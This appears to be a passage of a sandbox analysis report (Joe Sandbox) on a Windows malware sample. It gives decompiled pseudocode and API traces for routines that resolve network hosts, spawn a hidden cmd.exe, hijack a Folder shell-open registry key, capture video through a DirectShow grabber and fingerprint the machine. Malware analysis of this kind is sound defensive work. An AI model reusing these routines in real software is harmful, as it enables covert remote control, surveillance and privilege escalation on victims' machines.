									E0103102C(_t133, _t123 + 5,  *((char*)(_t123 + 4)));
									_v36 = _v36 & 0x00000000;
									E0103102C( *((char*)(_t123 + 4)) + _t133,  &_v36, 1);
									_t137 = _t137 + 0x28;
									_t87 =  &_v84;
									__imp__getaddrinfo(_t133, 0, _t87,  &_v20);
									if(_t87 == 0) {
										_t115 =  *( *((char*)(_t123 + 4)) + _t123 + 5) & 0x0000ffff;
										_t111 =  *((intOrPtr*)(_v20 + 0x18)) + 4;
										goto L12;
									}
								}
							} else {
								_t134 = _t123 + 4;
								__imp__InetNtopW(2, _t134,  &_v2156, 0x802);
								_t115 =  *(_t123 + 8) & 0x0000ffff;
								_t111 = _t134;
								L12:
								_t77 = E010408DC(_t111, _t115);
								L18:
								_v16 = _t77;
							}
							_v52 = 5;
							_v49 = 1;
							E010406F9( &_v52, 0xa, _v32);
							 *(_t95 + 8) = _v16;
							 *((char*)(_t95 + 4)) = 2;
							_v40 = 0;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							CreateThread(0, 0, E0104068D, _t95, 0,  &_v40);
							_t130 = _v24;
						}
						E01031099(_t130);
					} else {
						_v12 = 5;
						E010406F9( &_v12, 2, _t100);
						 *((char*)(_t95 + 4)) = 1;
						 *_t95 = _v32;
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
				}
				return _t61;
			}

0x01040477
0x01040669
0x0104066d
0x0104067f
0x01040680
0x01040681
0x01040682
0x00000000
0x00000000
0x01040487
0x01040488
0x01040491
0x01040495
0x010404a0
0x01040497
0x0104049b
0x0104049c
0x0104049d
0x0104049d
0x010404a2
0x010404a8
0x010404a8
0x010404b0
0x010404b8
0x010404b2
0x010404b2
0x010404b4
0x010404b4
0x010404bd
0x010404e8
0x01040650
0x0104065c
0x010404ee
0x010404fc
0x01040509
0x0104050c
0x01040511
0x01040512
0x01040512
0x01040517
0x01040518
0x01040519
0x0104051b
0x0104051e
0x01040523
0x0104054f
0x010405d9
0x010405ed
0x010405f9
0x00000000
0x010405f9
0x01040555
0x0104055d
0x01040567
0x0104056e
0x01040575
0x01040585
0x0104058d
0x01040592
0x010405a3
0x010405a8
0x010405af
0x010405b6
0x010405be
0x010405c4
0x010405cf
0x00000000
0x010405cf
0x010405be
0x01040525
0x01040531
0x01040537
0x0104053d
0x01040541
0x01040543
0x01040543
0x010405fe
0x010405fe
0x010405fe
0x0104060a
0x01040610
0x01040614
0x01040623
0x0104062e
0x01040635
0x0104063a
0x01040642
0x01040644
0x01040645
0x0104064b
0x0104064b
0x01040663
0x010404bf
0x010404c5
0x010404cb
0x010404d5
0x010404d9
0x010404dc
0x010404dd
0x010404de
0x010404de
0x01040668
0x0104068c

Strings

pREw, xrefs: 010405B6

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: recv
String ID: pREw
API String ID: 1507349165-1714215553
Opcode ID: d97c42cd28e65bb7c20638ffc07c00436d44343f2dd4e4054ef468b6970848a9
Instruction ID: 6e70d73436008226311027b055a4aa6bdf9779ec0a3149eb6ffb52ab566c0b70
Opcode Fuzzy Hash: d97c42cd28e65bb7c20638ffc07c00436d44343f2dd4e4054ef468b6970848a9
Instruction Fuzzy Hash: DF61C5B1904215AFDB11CF94C885BEEB7B9BF48300F008069FA85BB185D7B5A945CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 01044CB1 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168
comCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E01044CB1(signed int __ecx, signed int _a4) {
				intOrPtr _v38;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _v112;
				char _v128;
				intOrPtr _v132;
				char _v200;
				intOrPtr _t49;
				intOrPtr* _t54;
				intOrPtr* _t58;
				intOrPtr* _t60;
				intOrPtr* _t71;
				signed int _t76;
				intOrPtr* _t78;
				intOrPtr* _t79;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed int _t91;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				intOrPtr* _t118;
				void* _t119;
				void* _t120;
				void* _t121;

				_t76 = __ecx;
				__imp__CoInitialize(0);
				_t111 = __ecx + 0x18;
				__imp__CoCreateInstance(0x10475c0, 0, 1, 0x104a79c, _t111);
				_t78 =  *_t111;
				if(_t78 != 0) {
					_t104 = __ecx + 0x1c;
					_t49 =  *((intOrPtr*)( *_t78))(_t78, 0x10475a0, _t104);
					_t79 =  *_t104;
					if(_t79 != 0) {
						_t49 =  *((intOrPtr*)( *_t79 + 4))(_t79);
						_t112 = __ecx + 0x20;
						if(_t112 != 0) {
							_t49 = E01044A12(_a4, _t112);
						}
						if( *_t112 != 0) {
							_t113 = _t76 + 0x24;
							__imp__CoCreateInstance(0x1047610, 0, 1, 0x104a78c, _t113);
							_t80 =  *_t113;
							if(_t80 != 0) {
								 *((intOrPtr*)( *_t80 + 0xc))(_t80,  *((intOrPtr*)(_t76 + 0x20)), L"Source");
								_t54 =  *_t113;
								 *((intOrPtr*)( *_t54 + 0xc))(_t54,  *_t104, L"Grabber");
								E01031052( &_v128, 0, 0x48);
								_t58 =  *((intOrPtr*)(_t76 + 0x18));
								_t121 = _t120 + 0xc;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								 *((intOrPtr*)( *_t58 + 0x10))(_t58,  &_v128);
								_t49 = E0104462F();
								 *((intOrPtr*)(_t76 + 0x28)) = _t49;
								if(_t49 != 0) {
									_t49 = E0104464B();
									 *((intOrPtr*)(_t76 + 0x2c)) = _t49;
									if(_t49 != 0) {
										_t85 =  *((intOrPtr*)(_t76 + 0x24));
										_t49 =  *((intOrPtr*)( *_t85 + 0x2c))(_t85,  *((intOrPtr*)(_t76 + 0x28)), _t49);
										if(_t49 >= 0) {
											_t60 =  *((intOrPtr*)(_t76 + 0x18));
											 *((intOrPtr*)( *_t60 + 0x14))(_t60,  &_v200);
											E0103102C(_t119 + _v132 + 0x30 - _v132 - 0x60, _v132 + 0x30, 0x28);
											E01044492( &_v200);
											_t107 = _a4;
											E01044AD1(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											E01035DE9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
											E0104457F( *_t76);
											_t49 = E0104462F();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t71 =  *((intOrPtr*)(_t76 + 0x18));
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t96 =  *((intOrPtr*)(_t76 + 0x24));
												_t118 = _t76 + 0x34;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x10475e0, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}

0x01044cbf
0x01044cc1
0x01044cc7
0x01044cd9
0x01044cdf
0x01044ce3
0x01044ceb
0x01044cf5
0x01044cf7
0x01044cfb
0x01044d04
0x01044d07
0x01044d0c
0x01044d13
0x01044d13
0x01044d1b
0x01044d21
0x01044d33
0x01044d39
0x01044d3d
0x01044d4e
0x01044d51
0x01044d5d
0x01044d68
0x01044d72
0x01044d78
0x01044d7e
0x01044d81
0x01044d82
0x01044d83
0x01044d8c
0x01044d8d
0x01044d8e
0x01044d8f
0x01044d92
0x01044d98
0x01044d9d
0x01044da2
0x01044dab
0x01044db0
0x01044db5
0x01044dbb
0x01044dc5
0x01044dca
0x01044dd0
0x01044ddd
0x01044df2
0x01044e00
0x01044e08
0x01044e14
0x01044e1f
0x01044e2f
0x01044e32
0x01044e36
0x01044e3e
0x01044e43
0x01044e48
0x01044e4a
0x01044e54
0x01044e57
0x01044e5a
0x01044e66
0x01044e68
0x01044e6c
0x00000000
0x01044e71
0x01044e6c
0x01044e48
0x01044dca
0x01044db5
0x01044da2
0x01044d3d
0x01044d1b
0x01044cfb
0x01044e78

APIs

CoInitialize.OLE32(00000000), ref: 01044CC1
CoCreateInstance.OLE32(010475C0,00000000,00000001,0104A79C,?,?,?), ref: 01044CD9
CoCreateInstance.OLE32(01047610,00000000,00000001,0104A78C,?,?,?,010475A0,?,?,?), ref: 01044D33

Part of subcall function 01044A12: CoCreateInstance.OLE32(01047600,00000000,00000001,0104A77C,?,748CB690,00000000,00000000,?,?,01044757), ref: 01044A40

Strings

vids, xrefs: 01044D6D
Source, xrefs: 01044D45
Grabber, xrefs: 01044D53

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateInstance$Initialize
String ID: Grabber$Source$vids
API String ID: 1108742289-4200688928
Opcode ID: a15ff94bd2cdcf55dc8906d4929d7a1db11e1ddd90d7d0f738d87fa6ade7ed64
Instruction ID: e0a14939ef7a9c02cc65bcc3b504d0d49f2e7d92215ce956dea5f1d08f03819b
Opcode Fuzzy Hash: a15ff94bd2cdcf55dc8906d4929d7a1db11e1ddd90d7d0f738d87fa6ade7ed64
Instruction Fuzzy Hash: 0F517EB1600201AFDF24DF65C8C5F9A7BB6BF49710B1045ACFA459F295CB71E905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01037A8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E01037A8E(void* __eflags) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				CHAR* _t27;

				_v8 = 0;
				E01040CFF( &_v8);
				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
				GetWindowsDirectoryA(_t27, 0x104);
				E0103102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
				E01031052( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
					return E01040CD8(_v8);
				}
				Sleep(0x3e8);
				return _v24.dwProcessId;
			}

0x01037a9c
0x01037a9f
0x01037ab7
0x01037abf
0x01037ad6
0x01037ae2
0x01037aec
0x01037af0
0x01037af1
0x01037af2
0x01037b0f
0x00000000
0x01037b24
0x01037b16
0x00000000

APIs

VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 01037AB1
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 01037ABF
lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 01037ACD
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 01037B07
Sleep.KERNEL32(000003E8), ref: 01037B16

Strings

\System32\cmd.exe, xrefs: 01037AC7

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
String ID: \System32\cmd.exe
API String ID: 2560724043-2003734499
Opcode ID: b7cb42a8ae40ec73ef3d5924dae61dcea14dfdf97677e9359241a451ba4662b6
Instruction ID: bf273d22964130867bba93d1a108f85d18a39beddff7fd08ec6fbc45dd24c8f4
Opcode Fuzzy Hash: b7cb42a8ae40ec73ef3d5924dae61dcea14dfdf97677e9359241a451ba4662b6
Instruction Fuzzy Hash: CA117CF564030DBFE721ABA8DDC6FEFB26CEF48644F000825F741B6080DAB49E048665

Uniqueness

Uniqueness Score: -1.00%

Function 01042E2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01042E2C(void* __ecx, char* _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						SetLastError(_t16);
						goto L2;
					}
				} else {
					SetLastError(_t9);
					L2:
					_t12 = 0;
				}
				return _t12;
			}

0x01042e3a
0x01042e51
0x01042e59
0x01042e7d
0x01042e7f
0x01042e87
0x01042e8c
0x01042e89
0x01042e5c
0x00000000
0x01042e5c
0x01042e5b
0x01042e5c
0x01042e5c
0x01042e62
0x01042e62
0x01042e90

APIs

lstrlenA.KERNEL32(010431BE,01048FE6,?,?,010431BE,01048FE6,?), ref: 01042E34
RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,010431BE,01048FE6,?), ref: 01042E51
SetLastError.KERNEL32(00000000,?,?,010431BE,01048FE6,?), ref: 01042E5C
RegSetValueExA.ADVAPI32(?,01048FE6,00000000,00000001,010431BE,00000000,?,?,010431BE,01048FE6,?), ref: 01042E74
RegCloseKey.ADVAPI32(?,?,?,010431BE,01048FE6,?), ref: 01042E7F

Strings

Software\Classes\Folder\shell\open\command, xrefs: 01042E47

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CloseErrorLastOpenValuelstrlen
String ID: Software\Classes\Folder\shell\open\command
API String ID: 1613093083-2536721355
Opcode ID: b3d3102adc703d703572d6ea6284401654959a589be7538671e4b6c676b1f723
Instruction ID: bab83673edb3e351a72ad5523484adf157a58180f9396bcbfc263745f419e8c3
Opcode Fuzzy Hash: b3d3102adc703d703572d6ea6284401654959a589be7538671e4b6c676b1f723
Instruction Fuzzy Hash: ABF062B9641214FBDF311F91AD89F9F3FA9EF05750F004560FA81A6044D77699009BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103F238 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0103F238(intOrPtr _a4) {
				intOrPtr* _t2;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t10;

				_t2 =  *0x118adb8; // 0x0
				if(_t2 == 0) {
					L2:
					_t10 = GetModuleHandleW(L"ntdll.dll");
					 *0x118adb8 = GetProcAddress(_t10, "RtlNtStatusToDosError");
					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
					_t2 =  *0x118adb8; // 0x0
					 *0x118ad94 = _t8;
				} else {
					_t8 =  *0x118ad94; // 0x0
					if(_t8 == 0) {
						goto L2;
					}
				}
				if(_t2 != 0 && _t8 != 0) {
					return  *0x118ad94( *_t2(_a4));
				}
				return _t2;
			}

0x0103f23b
0x0103f242
0x0103f24e
0x0103f25a
0x0103f26e
0x0103f279
0x0103f27b
0x0103f280
0x0103f244
0x0103f244
0x0103f24c
0x00000000
0x00000000
0x0103f24c
0x0103f289
0x00000000
0x0103f295
0x0103f29c

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,00000000,?,0103FC57,00000000), ref: 0103F254
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0103F262
GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 0103F273

Strings

RtlSetLastWin32Error, xrefs: 0103F268
ntdll.dll, xrefs: 0103F24F
RtlNtStatusToDosError, xrefs: 0103F25C

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
API String ID: 667068680-2897241497
Opcode ID: 1dfc26b340da17d1833ad71c6b9b51ac7b8a8477893a1dd84d805757aa41aacc
Instruction ID: 871a459ed1d205b2304536a60d8ca6509c3b09997a1ac495ae7f1264fa61d03f
Opcode Fuzzy Hash: 1dfc26b340da17d1833ad71c6b9b51ac7b8a8477893a1dd84d805757aa41aacc
Instruction Fuzzy Hash: 58F054B46003019BAF689F69F98892E3BEDAFC8712704417DF855C3209DB65D8918751

Uniqueness

Uniqueness Score: -1.00%

Function 0103C30D Relevance: 9.1, APIs: 6, Instructions: 73
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0103C30D(WCHAR* __ecx, void** __edx, long* _a4) {
				void** _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				long* _t14;
				long _t16;
				void* _t17;
				long* _t24;
				void* _t32;
				struct _OVERLAPPED* _t34;
				void* _t36;

				_t34 = 0;
				_v8 = __edx;
				_t36 =  *0x105696c - _t34; // 0x0
				if(_t36 == 0) {
					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0);
					if(_t32 != 0 && _t32 != 0xffffffff) {
						_t14 =  &_v20;
						__imp__GetFileSizeEx(_t32, _t14);
						if(_t14 != 0 && _v16 == 0) {
							_t16 = _v20;
							_t24 = _a4;
							 *_t24 = _t16;
							_t17 = LocalAlloc(0x40, _t16);
							 *_v8 = _t17;
							if(_t17 != 0) {
								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) {
									LocalFree( *_v8);
								} else {
									_t34 = 1;
								}
							}
						}
						CloseHandle(_t32);
					}
				} else {
					_t34 = E0103C3B9(__ecx, __edx, _a4);
				}
				return _t34;
			}

0x0103c314
0x0103c318
0x0103c31b
0x0103c321
0x0103c347
0x0103c34b
0x0103c352
0x0103c357
0x0103c35f
0x0103c366
0x0103c36a
0x0103c370
0x0103c372
0x0103c37b
0x0103c37f
0x0103c392
0x0103c3a5
0x0103c39b
0x0103c39d
0x0103c39d
0x0103c392
0x0103c3ab
0x0103c3ad
0x0103c3ad
0x0103c323
0x0103c32c
0x0103c32c
0x0103c3b8

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0103C341
GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0103C357
LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0103C372
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?), ref: 0103C38A
CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 0103C3AD

Part of subcall function 0103C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0103C3D8
Part of subcall function 0103C3B9: LocalAlloc.KERNEL32(00000040,?,?,0103C32B,?,00000000,?,00000000,?), ref: 0103C3E6
Part of subcall function 0103C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0103C3FC
Part of subcall function 0103C3B9: LocalFree.KERNEL32(?,?,0103C32B,?,00000000,?,00000000,?), ref: 0103C40A

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
String ID:
API String ID: 4225742195-0
Opcode ID: 688a0d9471ab5036d38a306442b0c6dbd8aa1085a59df65d86acf94496cb7c83
Instruction ID: 0257ae8ab547a5df47073c8f75bfbff0627cdc75307c723da32f96888a2e465c
Opcode Fuzzy Hash: 688a0d9471ab5036d38a306442b0c6dbd8aa1085a59df65d86acf94496cb7c83
Instruction Fuzzy Hash: 2311B779501114EBEB319B6CDE84EAE7BFCEF85750B004096F981F7144D7359A10CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01032E27 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107
stringCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E01032E27(void* __ecx, void* __edx, void* __eflags) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v76;
				char _v344;
				short _v864;
				void* __edi;
				void* _t28;
				void* _t32;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t54;
				void* _t75;
				void* _t76;
				void* _t81;
				void* _t82;
				void* _t84;

				_t84 = __eflags;
				_t54 = __ecx;
				_t76 = __edx;
				E01040D2D(E01040E5E( &_v24, __edx),  &_v20);
				GetModuleFileNameA(0,  &_v344, 0x104);
				_v16 = 0;
				_t28 = E010434A2( &_v344,  &_v16);
				_v12 = 0;
				E01043279(_t28, _v16, 0x10ad,  &_v12);
				_t82 = _t81 + 4;
				E010336F7(_t82, _v20);
				E010336F7(_t82, _v24);
				_t32 = E01040F3E();
				E010336F7(_t82, 0x1047668);
				_t64 = _t82;
				E0104119D(_t82);
				_t35 = E01041177(_t82);
				_t36 = E0104111B();
				_t37 = E01040F61();
				E010411D7(_t82, _v16);
				E01035044(_t54, E0103430E( &_v76, _v16, _t84, _t82, _t64, 0x10e, _t37, _t36, _t35, _t82, _t82, _v12, _t32, _t82, _t75));
				E010342CC( &_v76, _t76);
				if( *((intOrPtr*)(_t76 + 0x34)) != 0) {
					E01031052( &_v864, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v864);
					lstrcatW( &_v864, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v864, 0);
					E0103906F(_t54, 1);
					_v12 = 0x104a8b0;
					E01035044(_t54,  &_v12);
				}
				E01035FEB(_v20);
				return E01035FEB(_v24);
			}

0x01032e27
0x01032e32
0x01032e38
0x01032e42
0x01032e56
0x01032e5f
0x01032e68
0x01032e7b
0x01032e7e
0x01032e86
0x01032e8e
0x01032e97
0x01032e9c
0x01032ead
0x01032eb3
0x01032eb5
0x01032eba
0x01032ec0
0x01032ec6
0x01032ed5
0x01032ee5
0x01032eed
0x01032ef7
0x01032f06
0x01032f1a
0x01032f2c
0x01032f3a
0x01032f43
0x01032f4b
0x01032f55
0x01032f55
0x01032f5d
0x01032f6e

APIs

Part of subcall function 01040D2D: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 01040D44
Part of subcall function 01040D2D: CoInitialize.OLE32(00000000), ref: 01040D4B
Part of subcall function 01040D2D: CoCreateInstance.OLE32(010474B0,00000000,00000017,01049CC8,?,?,?,?,?,?,?,?,?,01032E47), ref: 01040D69

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01032E56

Part of subcall function 010434A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?,?,01045553), ref: 010434CF
Part of subcall function 010434A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,01045553), ref: 010434E2
Part of subcall function 010434A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,01045553), ref: 010434F3
Part of subcall function 010434A2: FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,01045553), ref: 01043500

Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,00000000,?,01043483,00000000,00000000,.bss,00000000), ref: 01033700
Part of subcall function 010336F7: lstrlenW.KERNEL32(01043483,?,01043483,00000000,00000000,.bss,00000000), ref: 01033717
Part of subcall function 010336F7: KiUserExceptionDispatcher.NTDLL ref: 01033732

Part of subcall function 01040F3E: GlobalMemoryStatusEx.KERNEL32(?), ref: 01040F4F

Part of subcall function 0104119D: GetComputerNameW.KERNEL32 ref: 010411C0

Part of subcall function 01041177: GetCurrentProcess.KERNEL32(?,?,01032EBF,?,01047668,?,?,00000000,?,?,?), ref: 0104117B

Part of subcall function 0104111B: GetCurrentProcess.KERNEL32(00000008,00000000,76B30770,00000000,76B30770,00000000,?,?,?,?,0104563F,?), ref: 0104112D
Part of subcall function 0104111B: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0104563F,?), ref: 01041134
Part of subcall function 0104111B: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,0104563F,?), ref: 01041152
Part of subcall function 0104111B: FindCloseChangeNotification.KERNEL32(00000000), ref: 01041167

Part of subcall function 01040F61: LoadLibraryA.KERNEL32(ntdll.dll), ref: 01040F79
Part of subcall function 01040F61: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 01040F89

Part of subcall function 010411D7: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000101,?,SOFTWARE\Microsoft\Cryptography,?,?,?,?,00000000,?,?,?), ref: 0104121B

SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,?,?), ref: 01032F1A
lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 01032F2C
CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 01032F3A

Part of subcall function 0103906F: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 0103907B
Part of subcall function 0103906F: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 01039092
Part of subcall function 0103906F: EnterCriticalSection.KERNEL32(0118A808,?,00000000,?,?,?,?,01032F48,?,00000001,?,?), ref: 0103909E
